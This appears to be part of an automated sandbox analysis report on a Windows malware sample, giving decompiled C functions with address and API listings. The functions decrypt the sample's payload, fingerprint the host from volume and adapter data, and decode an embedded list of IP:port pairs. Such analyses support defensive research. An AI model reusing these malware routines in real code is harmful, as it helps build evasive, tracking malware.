                                                                                                                                                                                                                                                                          0x040045b3
                                                                                                                                                                                                                                                                          0x040045c0
                                                                                                                                                                                                                                                                          0x040047d0
                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                          0x040047e0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040047d7
                                                                                                                                                                                                                                                                          0x040045d6
                                                                                                                                                                                                                                                                          0x040045dc
                                                                                                                                                                                                                                                                          0x040045e9
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040045ef
                                                                                                                                                                                                                                                                          0x04004617
                                                                                                                                                                                                                                                                          0x0400461f
                                                                                                                                                                                                                                                                          0x040047a9
                                                                                                                                                                                                                                                                          0x040047b0
                                                                                                                                                                                                                                                                          0x040047c0
                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                          0x040047c6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04004637
                                                                                                                                                                                                                                                                          0x0400463e
                                                                                                                                                                                                                                                                          0x04004644
                                                                                                                                                                                                                                                                          0x04004660
                                                                                                                                                                                                                                                                          0x04004665
                                                                                                                                                                                                                                                                          0x0400466d
                                                                                                                                                                                                                                                                          0x0400467f
                                                                                                                                                                                                                                                                          0x0400468f
                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                          0x04004695
                                                                                                                                                                                                                                                                          0x040046a8
                                                                                                                                                                                                                                                                          0x040046c2
                                                                                                                                                                                                                                                                          0x040046c8
                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                          0x0400470f
                                                                                                                                                                                                                                                                          0x0400473b
                                                                                                                                                                                                                                                                          0x0400476b
                                                                                                                                                                                                                                                                          0x0400473d
                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                          0x04004750
                                                                                                                                                                                                                                                                          0x04004777
                                                                                                                                                                                                                                                                          0x0400478f
                                                                                                                                                                                                                                                                          0x04004794
                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                          0x040046dd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400479e
                                                                                                                                                                                                                                                                          0x0400479c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040046e3
                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400466f
                                                                                                                                                                                                                                                                          0x0400461f

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 0400482A
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: GetLastError.KERNEL32 ref: 04004834
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04004850
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                            • Part of subcall function 040047F0: CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400468F
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2585753175-0
                                                                                                                                                                                                                                                                          • Opcode ID: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                          • Instruction ID: c94ea80790bf0b6d8dbf2583483555f7aa9864fa89971da120b97b62dce4532c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b532c3e78661638157de6fb4dddf30e3a22c3d81890ac6d0c72b3463451886
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92815D74A056189BEB64CF14DC94BAAB7B4AF49306F0091D9E608BB2C1D774ABC1CF54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                                                                          			E04009D20(intOrPtr _a4, CHAR* _a8, int _a12) {
                                                                                                                                                                                                                                                                          				char _v5;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                                                                                                          				long _v408;
                                                                                                                                                                                                                                                                          				char _v673;
                                                                                                                                                                                                                                                                          				char _v676;
                                                                                                                                                                                                                                                                          				intOrPtr _v680;
                                                                                                                                                                                                                                                                          				long _v684;
                                                                                                                                                                                                                                                                          				signed int _v688;
                                                                                                                                                                                                                                                                          				short* _v692;
                                                                                                                                                                                                                                                                          				signed int _v696;
                                                                                                                                                                                                                                                                          				unsigned int _v700;
                                                                                                                                                                                                                                                                          				intOrPtr _v704;
                                                                                                                                                                                                                                                                          				char _v900;
                                                                                                                                                                                                                                                                          				signed int _v904;
                                                                                                                                                                                                                                                                          				signed int _v908;
                                                                                                                                                                                                                                                                          				int _v912;
                                                                                                                                                                                                                                                                          				int _t71;
                                                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                                                          				short** _t76;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 > 0) {
                                                                                                                                                                                                                                                                          					_v12 = 0x20;
                                                                                                                                                                                                                                                                          					_v24 = 6;
                                                                                                                                                                                                                                                                          					_v684 = 0;
                                                                                                                                                                                                                                                                          					_v20 = 0;
                                                                                                                                                                                                                                                                          					_v408 = 0;
                                                                                                                                                                                                                                                                          					_v16 = 0x19660d;
                                                                                                                                                                                                                                                                          					_v296 = 0x3c6ef35f;
                                                                                                                                                                                                                                                                          					_v680 = _a4;
                                                                                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v676, 0x103) != 0) {
                                                                                                                                                                                                                                                                          						_v673 = 0;
                                                                                                                                                                                                                                                                          						_t71 = GetVolumeInformationA( &_v676,  &_v292, 0x103,  &_v684,  &_v20,  &_v408,  &_v404, 0x63); // executed
                                                                                                                                                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                                                                                                                                                          							_v688 = 0xffffffff;
                                                                                                                                                                                                                                                                          							E04007D20(_t71,  &_v900, 0, 0xc0);
                                                                                                                                                                                                                                                                          							_v700 = 0;
                                                                                                                                                                                                                                                                          							_t74 = E04009F70( &_v900, 0xc0,  &_v700); // executed
                                                                                                                                                                                                                                                                          							if(_t74 != 0) {
                                                                                                                                                                                                                                                                          								_v904 = 0;
                                                                                                                                                                                                                                                                          								while(_v904 < _v700 >> 2) {
                                                                                                                                                                                                                                                                          									_v688 = _v688 ^  *(_t114 + _v904 * 4 - 0x380);
                                                                                                                                                                                                                                                                          									_v904 = _v904 + 1;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v696 = _v684;
                                                                                                                                                                                                                                                                          							_v908 = 0;
                                                                                                                                                                                                                                                                          							while(_v908 < 4) {
                                                                                                                                                                                                                                                                          								 *(_v680 + _v908 * 4) = 0x3c6ef35f + _v696 * 0x0019660d ^ _v688;
                                                                                                                                                                                                                                                                          								_v696 = 0x3c6ef35f + _v696 * 0x19660d;
                                                                                                                                                                                                                                                                          								_v908 = _v908 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t76 =  &_v692;
                                                                                                                                                                                                                                                                          							__imp__StringFromCLSID(_a4, _t76); // executed
                                                                                                                                                                                                                                                                          							_v704 = _t76;
                                                                                                                                                                                                                                                                          							if(_v704 >= 0) {
                                                                                                                                                                                                                                                                          								_v912 = WideCharToMultiByte(0, 0, _v692, 0xffffffff, _a8, _a12, 0, 0);
                                                                                                                                                                                                                                                                          								lstrcpynA(_a8,  &(_a8[1]), _v912 - 2);
                                                                                                                                                                                                                                                                          								_v5 = 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CoTaskMemFree(_v692);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}





























                                                                                                                                                                                                                                                                          0x04009d29
                                                                                                                                                                                                                                                                          0x04009d31
                                                                                                                                                                                                                                                                          0x04009d4b
                                                                                                                                                                                                                                                                          0x04009d52
                                                                                                                                                                                                                                                                          0x04009d59
                                                                                                                                                                                                                                                                          0x04009d63
                                                                                                                                                                                                                                                                          0x04009d6a
                                                                                                                                                                                                                                                                          0x04009d74
                                                                                                                                                                                                                                                                          0x04009d7b
                                                                                                                                                                                                                                                                          0x04009d88
                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                          0x04009da8
                                                                                                                                                                                                                                                                          0x04009ddd
                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                          0x04009deb
                                                                                                                                                                                                                                                                          0x04009e03
                                                                                                                                                                                                                                                                          0x04009e0b
                                                                                                                                                                                                                                                                          0x04009e28
                                                                                                                                                                                                                                                                          0x04009e32
                                                                                                                                                                                                                                                                          0x04009e34
                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                          0x04009e73
                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                          0x04009e49
                                                                                                                                                                                                                                                                          0x04009e4f
                                                                                                                                                                                                                                                                          0x04009e81
                                                                                                                                                                                                                                                                          0x04009e87
                                                                                                                                                                                                                                                                          0x04009ea2
                                                                                                                                                                                                                                                                          0x04009ecf
                                                                                                                                                                                                                                                                          0x04009ee4
                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                          0x04009e9c
                                                                                                                                                                                                                                                                          0x04009eec
                                                                                                                                                                                                                                                                          0x04009ef7
                                                                                                                                                                                                                                                                          0x04009efd
                                                                                                                                                                                                                                                                          0x04009f0a
                                                                                                                                                                                                                                                                          0x04009f2b
                                                                                                                                                                                                                                                                          0x04009f46
                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                          0x04009f4c
                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                          0x04009f57
                                                                                                                                                                                                                                                                          0x04009de5
                                                                                                                                                                                                                                                                          0x04009da2
                                                                                                                                                                                                                                                                          0x04009f63

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 04009D9A
                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 04009DDD
                                                                                                                                                                                                                                                                            • Part of subcall function 04009F70: GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                          • StringFromCLSID.OLE32(00000020,?), ref: 04009EF7
                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 04009F25
                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 04009F46
                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 04009F57
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2697952880-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                          • Instruction ID: 5e89223982a4db5088977870fe710af53f8bde251be69ccbe6f0708d183867dd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 019f01e5d103752babcd14cd7d8c94bd9c738822c2c1009ff713c67dab5555ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 695139B0A043189FEB25CF50CC88BEAB7B9BB44304F14C2D9E5096A281DB74AB84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04001390(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                          				signed char* _v8;
                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                                                          				long _v32;
                                                                                                                                                                                                                                                                          				signed int _t52;
                                                                                                                                                                                                                                                                          				signed int _t57;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                          				void* _t106;
                                                                                                                                                                                                                                                                          				void* _t107;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t52 = __eax;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a4 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					return _t52 | 0xffffffff;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = 0;
                                                                                                                                                                                                                                                                          					_t57 = RtlAllocateHeap(GetProcessHeap(), 8, _a8 + 5); // executed
                                                                                                                                                                                                                                                                          					_v28 = _t57;
                                                                                                                                                                                                                                                                          					if(_v28 != 0) {
                                                                                                                                                                                                                                                                          						E04007B70(_v28, _a4, _a8);
                                                                                                                                                                                                                                                                          						E04007B70(_v28 + _a8, "====", 4);
                                                                                                                                                                                                                                                                          						_t106 = _t104 + 0x18;
                                                                                                                                                                                                                                                                          						_v8 = _v28;
                                                                                                                                                                                                                                                                          						_v20 = 3;
                                                                                                                                                                                                                                                                          						while(_v20 == 3) {
                                                                                                                                                                                                                                                                          							_v32 = 0;
                                                                                                                                                                                                                                                                          							while(_v32 < 4) {
                                                                                                                                                                                                                                                                          								while( *_v8 != 0x3d) {
                                                                                                                                                                                                                                                                          									_t76 = E04001500( *_v8 & 0x000000ff);
                                                                                                                                                                                                                                                                          									_t106 = _t106 + 4;
                                                                                                                                                                                                                                                                          									if(_t76 >= 0) {
                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								 *((char*)(_t103 + _v32 - 0xc)) =  *_v8;
                                                                                                                                                                                                                                                                          								_v8 =  &(_v8[1]);
                                                                                                                                                                                                                                                                          								_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_t64 = E04001580( &_v16,  &_v12);
                                                                                                                                                                                                                                                                          							_t107 = _t106 + 8;
                                                                                                                                                                                                                                                                          							_v20 = _t64;
                                                                                                                                                                                                                                                                          							if(_a16 >= _v20) {
                                                                                                                                                                                                                                                                          								E04007B70(_a12,  &_v12, _v20);
                                                                                                                                                                                                                                                                          								_t106 = _t107 + 0xc;
                                                                                                                                                                                                                                                                          								_a12 = _a12 + _v20;
                                                                                                                                                                                                                                                                          								_a16 = _a16 - _v20;
                                                                                                                                                                                                                                                                          								_v24 = _v24 + _v20;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							return HeapFree(GetProcessHeap(), 0, _v28) | 0xffffffff;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						RtlFreeHeap(GetProcessHeap(), 0, _v28); // executed
                                                                                                                                                                                                                                                                          						return _v24;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return _t57 | 0xffffffff;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}


















                                                                                                                                                                                                                                                                          0x04001390
                                                                                                                                                                                                                                                                          0x0400139a
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013b6
                                                                                                                                                                                                                                                                          0x040013cd
                                                                                                                                                                                                                                                                          0x040013d3
                                                                                                                                                                                                                                                                          0x040013da
                                                                                                                                                                                                                                                                          0x040013f0
                                                                                                                                                                                                                                                                          0x04001406
                                                                                                                                                                                                                                                                          0x0400140b
                                                                                                                                                                                                                                                                          0x04001411
                                                                                                                                                                                                                                                                          0x04001414
                                                                                                                                                                                                                                                                          0x0400141b
                                                                                                                                                                                                                                                                          0x04001425
                                                                                                                                                                                                                                                                          0x04001437
                                                                                                                                                                                                                                                                          0x0400143d
                                                                                                                                                                                                                                                                          0x0400144f
                                                                                                                                                                                                                                                                          0x04001454
                                                                                                                                                                                                                                                                          0x04001459
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                          0x04001461
                                                                                                                                                                                                                                                                          0x0400146e
                                                                                                                                                                                                                                                                          0x04001478
                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                          0x04001434
                                                                                                                                                                                                                                                                          0x04001485
                                                                                                                                                                                                                                                                          0x0400148a
                                                                                                                                                                                                                                                                          0x0400148d
                                                                                                                                                                                                                                                                          0x04001496
                                                                                                                                                                                                                                                                          0x040014bc
                                                                                                                                                                                                                                                                          0x040014c1
                                                                                                                                                                                                                                                                          0x040014ca
                                                                                                                                                                                                                                                                          0x040014d3
                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014dc
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014ab
                                                                                                                                                                                                                                                                          0x040014f1
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040014f7
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040013dc

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 040013C6
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 040013CD
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0400149E
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 040014A5
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 040014EA
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 040014F1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                                                                                                          • String ID: ====
                                                                                                                                                                                                                                                                          • API String ID: 168621272-1026985228
                                                                                                                                                                                                                                                                          • Opcode ID: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                          • Instruction ID: c6e28297ba35799b7f22f7dab3aca0fae7ec72587fc4187f79a8e8c8e7655232
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc6d638cfefe3820553d32bbcecc0cddb825681ad85667f70979d716b4f01239
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7414CB5D04209EBEB04DFA4C884BEE7BB5FF44309F108619E515BB2D0D735AA45CB92
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 96%
                                                                                                                                                                                                                                                                          			E04007970(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				long _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				void* _t50;
                                                                                                                                                                                                                                                                          				intOrPtr _t52;
                                                                                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                                                          				intOrPtr _t72;
                                                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                          					_v16 = 0x8c;
                                                                                                                                                                                                                                                                          					_v20 = 0x75bc;
                                                                                                                                                                                                                                                                          					_t50 = VirtualAlloc(0, 0x75bc, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                          					_v12 = _t50;
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_t72 =  *0x400e28c; // 0x4013f88
                                                                                                                                                                                                                                                                          						_t83 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                          						_t52 = E0400A400(_t83, _t72, _v12, 0x75bc); // executed
                                                                                                                                                                                                                                                                          						_t97 = _t96 + 0x10;
                                                                                                                                                                                                                                                                          						_v24 = _t52;
                                                                                                                                                                                                                                                                          						if(_v24 >= 0x92) {
                                                                                                                                                                                                                                                                          							_v28 = _v24 - 0x8c;
                                                                                                                                                                                                                                                                          							_t58 = E04008A70(_v12 + 0x8c,  &_v28, _v12, 0x8c, 0x40130e8, 0x254);
                                                                                                                                                                                                                                                                          							_t98 = _t97 + 0x18;
                                                                                                                                                                                                                                                                          							if(_t58 != 0) {
                                                                                                                                                                                                                                                                          								_v32 = _v12 + 0x8c;
                                                                                                                                                                                                                                                                          								_v36 = _v28 / 6;
                                                                                                                                                                                                                                                                          								_v40 = VirtualAlloc(0, _v36 * 0x28, 0x3000, 4);
                                                                                                                                                                                                                                                                          								if(_v40 != 0) {
                                                                                                                                                                                                                                                                          									_v48 = 0;
                                                                                                                                                                                                                                                                          									while(_v48 < _v36) {
                                                                                                                                                                                                                                                                          										_t64 = E04007B70( &_v44, _v48 * 6 + _v32, 4);
                                                                                                                                                                                                                                                                          										_push(_v44);
                                                                                                                                                                                                                                                                          										L0400B1EC();
                                                                                                                                                                                                                                                                          										_v52 = _t64;
                                                                                                                                                                                                                                                                          										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                          										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                          										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                          										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									 *_a4 = _v40;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                                                                          0x04007976
                                                                                                                                                                                                                                                                          0x04007981
                                                                                                                                                                                                                                                                          0x04007987
                                                                                                                                                                                                                                                                          0x0400798e
                                                                                                                                                                                                                                                                          0x040079a3
                                                                                                                                                                                                                                                                          0x040079a9
                                                                                                                                                                                                                                                                          0x040079b0
                                                                                                                                                                                                                                                                          0x040079bf
                                                                                                                                                                                                                                                                          0x040079c6
                                                                                                                                                                                                                                                                          0x040079cd
                                                                                                                                                                                                                                                                          0x040079d2
                                                                                                                                                                                                                                                                          0x040079d5
                                                                                                                                                                                                                                                                          0x040079df
                                                                                                                                                                                                                                                                          0x040079ed
                                                                                                                                                                                                                                                                          0x04007a10
                                                                                                                                                                                                                                                                          0x04007a15
                                                                                                                                                                                                                                                                          0x04007a1a
                                                                                                                                                                                                                                                                          0x04007a29
                                                                                                                                                                                                                                                                          0x04007a38
                                                                                                                                                                                                                                                                          0x04007a51
                                                                                                                                                                                                                                                                          0x04007a58
